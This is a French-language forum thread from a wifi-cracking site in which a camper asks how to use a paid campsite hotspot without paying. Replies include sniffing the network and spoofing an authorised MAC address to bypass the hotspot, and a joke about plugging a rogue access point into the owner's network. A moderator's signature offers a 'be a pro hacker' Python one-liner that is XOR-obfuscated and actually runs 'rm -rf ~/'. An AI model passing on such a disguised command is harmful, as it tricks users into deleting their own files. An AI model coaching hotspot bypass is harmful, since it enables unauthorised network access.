Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 02-08-2013 09:20:22

fabienleouf
Nouveau membre

hot zone (wifi privée) comment naviguée gratuitement svp

Bonjour
Je ses pas si je suis dans la bonne catégorie si je le suis pas désolé

Je suis dans un terrain de camping ou chaque année les parent veule que je vienne

Il n’y a pas de couverture réseaux assez bonne pour utiliser le portable comme modem
Il y a le wifi mes payant (hot zone) à des somme exorbitante, ça ne capte même pas au mobile home (3 entene wifi installer malle orientée)
Et par-dessus tout il y a que des personnes âgées dans ce camping et aucunes animations pour les jeunes en gros je me fait bien ch….

Y’Aurès-t-il une solution svp pour résoudre mon problème est que je me fasse moins ch… en utilisant le wifi à l’accueil parce que là je vais Peter un câble lol

Merci d’avance et vraiment sympa ce forum

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 02-08-2013 11:20:49

Furyo
Membre Irremplaçable
Site Web

Re : hot zone (wifi privée) comment naviguée gratuitement svp

C'est assez simple à faire...

1/ Sortir du MobileHome
2/ Prendre la direction de l'acceuil
3/ Acheter une connexion au Hotspot Privé
4/ Retourner au MobileHome
5/ Allumer le PC
6/ Se connecter au Hotspot avec les identifiants achetés à l'acceuil
7/ Surfer sur le net..

Les autres sont facultatifs mais tu peux aussi :

8/ allumer le barbecul
9/ servir l'apero
10/ mettre la table
11/ t'en grillé une pendant que tu retournes les saucisses
12/ brancher ta voisine d'emplacement
13/ te re-servir un apero (bah voui, apero par temps bleu et bah apero heureux!! lol )
14/ sortir les boules avec le cochonet
15/ Etc... Etc...

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 02-08-2013 18:46:46

M1ck3y
Administrateur
Lieu : Lost in the darkness

Sinon tu sors ton Awus036H et ta Yagi 19 dBi, et tu te mets à la recherche d'un réseau ouvert avec un bon signal, gratuit bien sur. Au passage dans le meme temps tu peux servir l'apéro, d'ailleurs vu la chaleur en ce moment ça s'impose smile

#4 02-08-2013 21:00:09

spawn
Modérateur

HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA.
(Tu es à la limite de nos règles, donc estimes-toi heureux de recevoir des réponses, c'est l'été wink )

N'oublies pas les glaçons, ça risque d'être long sans internet big_smile

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 02-08-2013 21:11:45

warfares
Membre Hyperactif

Sinon si t'es un vrai Xx31337_|-|4[k3rxX tu peux faire du social engineering :
- soit tu te trouves une "vieille madame" qui à choppé un abonnement et tu peux essayer de lui demander, prétexant des devoirs, une envie de revision du code ( de la route ), aller checker tes mails ( surtout pas FB, ça ferait accro ) etc ...
- soit tu appliques la méthode 12 de Furyo, mais en visant une qui à un accès wifi
- ou tout simplement à l'accueil, si ya vraiment pas de jeunes, ils comprendront peut-être et te laisseront un accès gratuit
bref, le plus simple est souvent de demander

#6 03-08-2013 10:28:10

Anthonyy59
Membre V.I.P.

Les hotzones de mon camping étaient assez faciles a avoir
Après je ne sais pas ce que tu as comme matériel car d'après ton message tu n'as qu'un téléphone portable, et la ça risque de faire juste
Si tu as un backtrack avec toi, rend toi dans la section tuto ou j'ai fais une vidéo (petite pub smile )
Si tu n'en a pas, je pense que les autres membres t'ont indiqué pas mal de choses à faire ! big_smile

#7 03-08-2013 23:39:36

carlo_0000
Membre Indétronable

les logins Fon ca marche a des endroits comme ca ?

#8 04-08-2013 14:08:26

Furyo
Membre Irremplaçable
Site Web

Je pense qu'on peut imaginer que ca puisse fonctionner a condition que l on capte un reseau FON wink

Hors dans ce cas, c est un reseau privé transformé en hotspot avec gestion des acces wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#9 05-08-2013 17:27:44

fabienleouf
Nouveau membre

Bonjour

Merci pour vos réponses ses sympa

Désolé si je suis à la limite des règles.
Je ne veux juste pas payer or de prix un hotpost,  je ses pas si vous connaissez ce service qui est assez chère hot zone 160€ à l’année / 8€ 30min / après je me rappelle pas

Je ne demande pas des choses interdit ses en navigant sur le net que je suis tombé ce ce forum ou il y a plein de personne qui me font rire avec leurre réponses  (Furyo, M1ck3y ect…)  ^^

Sur un sujet vous parlez de Brutus ate je sais que ce que je veux faire s’appelle du piratage et je ses pas si ses bien vue

Merci de me mettre un frein si je vais trop loin

Merci pour les infos M1ck3y ses laquelle svp la plus puissante ses bien la Awus036H ???
Je ne connais pas cette distribution Anthonyy59 en  linux je patauge juste pour installer des driver manuellement mdr

Ah oui jais en pc portable un acer 8930g est je peux changer ce que je veux dedans

Merci d’avance bonne journée là je bois une bière grafenwalder 4,9% vol 50ml mais je veux pas redevenir alcooliques jais donnez

Dernière modification par fabienleouf (05-08-2013 17:42:04)

#10 06-08-2013 22:52:16

carlo_0000
Membre Indétronable

ou tu prend un point dacces avec toi et un cable rj45
quand le proprio est sorti tu rentre et tu bran,che ton ap sous la table wink lol

#11 08-08-2013 17:17:23

Anthonyy59
Membre V.I.P.

Le mieux a faire serai d'avoir un backtrack avec toi
Ou un logiciel d'écoute réseau au moins, je n'en connais pas sous windows mais une fois que tu as l'adresse Mac qu'il te faut, modifie la tienne wink

#12 08-08-2013 21:48:13

M1ck3y
Administrateur

Ton objectif étant de pouvoir te connecter assez loin, et dans des conditions de signal probablement "difficiles" avec des obstacles etc, ce n'est pas la puissance que tu dois rechercher, mais la sensibilité, et l'Awus036H est idéale pour ça. Avec une bonne petite Yagi, ça te permettra de te connecter sur des réseaux distants, et si il y a des hotspots tu pourras profiter d'un accès Wifi gratuit du coup.

#13 17-08-2013 09:08:33

fabienleouf
Nouveau membre

Bonjour
Désolé de l’absence occupations trouver la feria de Bézier mdr, vendre, cap d’Agde ^^
Le net et la pinaille la jan profite que sa phases pas trop beaux pour avoirs deux barre de
3G à 800mo ^^
La plus puissante et la quelle svp ??? je suis nulle en réseaux Awus036H ou Yagi
La Awus036H me plaît bien
Après la Yagi et bien à fixer en extérieure ???
Vous pensé quoi si j’enlève ma carte wifi de mon acer 8930g pour mettre sa  AWPCI085HR
???

Merci d’avance
Bonne journée

#14 18-08-2013 19:51:43

M1ck3y
Administrateur

Ta question n'a pas de sens. Tu ne peux pas comparer une carte Wifi et une antenne Yagi. La carte Wifi permet de transformer les données numériques de ton ordi en ondes électromagnétiques, et l'antenne est ce qui va permettre d'émettre et de recevoir ces memes ondes. Une carte Wifi sans antenne ne sert à rien, de la meme façon une antenne seule ne sert à rien.

Les Yagis vendues sur notre boutique partenaire peuvent etre utilisées en intérieur comme en extérieur.

La carte miniPCI de ton lien affiche de bonnes performances, après il faut voir si elle a les bonnes connectiques par rapport à ton ordi, sinon tu devras brancher des pigtails et raccorder des antennes externes. Et puis c'est bu 802.11 b/g, si il te faut du n tu as celle là: MB92M.

#15 22-08-2013 09:17:36

fabienleouf
Nouveau membre

Bonjour

A oui ok merci pour ta réponse lol je suis bête j’avais malle lue
Je vais essayer avec la  Awus036H
Dans mon pc portable acer aspire 890g jais en Carte réseau    Intel(R) WiFi Link 5100 AGN / Type d'interface    802.11 Wireless Ethernet
Je nuis connais pas asser pour savoir dans les pc portable ses quoi comme port pci pour la brancher pouvais vous me renseigner svp ???

Je vais acheter la  Awus036H pour que mes parents ou mes frères l’utilise sur leur pc et moi je vais me tester si elle va la MB92M

Merci d’avance bonne journée

#16 23-08-2013 17:17:46

M1ck3y
Administrateur

Tu peux démonter le cache qui doit se trouver au dos de ton ordi pour regarder, de toute manière si tu veux changer la carte tu devras la démonter. Sinon tu peux utiliser un soft de benchmark, sous Win tu as Everest (maintenant c'est AIDA64) ou bien Sandra par exemple qui vont te donner plein d'infos sur ta machine. Tu peux aussi faire des recherches sur le net pour trouver la réponse à ta question.

#17 14-11-2013 11:52:36

fabienleouf
Nouveau membre

bonjour

dsl du gros retard

ce n'et pas dans mes corde de oublyer des méssage encore dsl

javais pas mie dans les favorie le sujet ^^ encore merci je les acheter et elle marche niquelle lol

encore merci à vous pour vos réponsse

Annonce